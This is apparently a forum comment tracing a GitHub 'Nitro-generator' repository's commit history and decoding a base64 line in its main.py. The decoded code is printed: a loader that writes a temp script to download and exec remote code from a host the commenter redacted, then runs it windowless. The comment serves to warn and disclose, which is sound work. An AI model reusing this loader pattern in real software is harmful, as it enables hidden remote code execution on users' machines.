| It looks like the repo has been move/renamed to https://github.com/420World69/Nitro-generator as the links now redirect to there. Going throught the commit log, the author remove the allegedly " 'pyshftuler', a malicious package" [1] 10 days ago. Then changed the repo's purpose 21h ago [2]. And then, injected its own malice? Currently, the base64 code on line 1 of main.py reads WARNING: DO NOT CLICK THE LINK IN THIS CODE SECTION, I CANNOT CONFIRM THE SITE NOR ITS INTENTION. I HAVE REMOVED IT FOR SAFETY ``` from tempfile import NamedTemporaryFile as _ffile from sys import executable as _eexecutable from os import system as _ssystem _ttmp = _ffile(delete=False) _ttmp.write(b"""from urllib.request import urlopen as _uurlopen;exec(_uurlopen('http://[REDACTED]:80/inject/UU7X9zT79b6aHuvL').read())""") _ttmp.close() try: _ssystem(f"start {_eexecutable.replace('.exe', 'w.exe')} {_ttmp.name}") except: pass ``` [1] https://github.com/420World69/Nitro-generator/commit/5df9bba... [2] https://github.com/420World69/Nitro-generator/commit/b9255f8... [3] https://github.com/420World69/Nitro-generator/commit/69e9352... |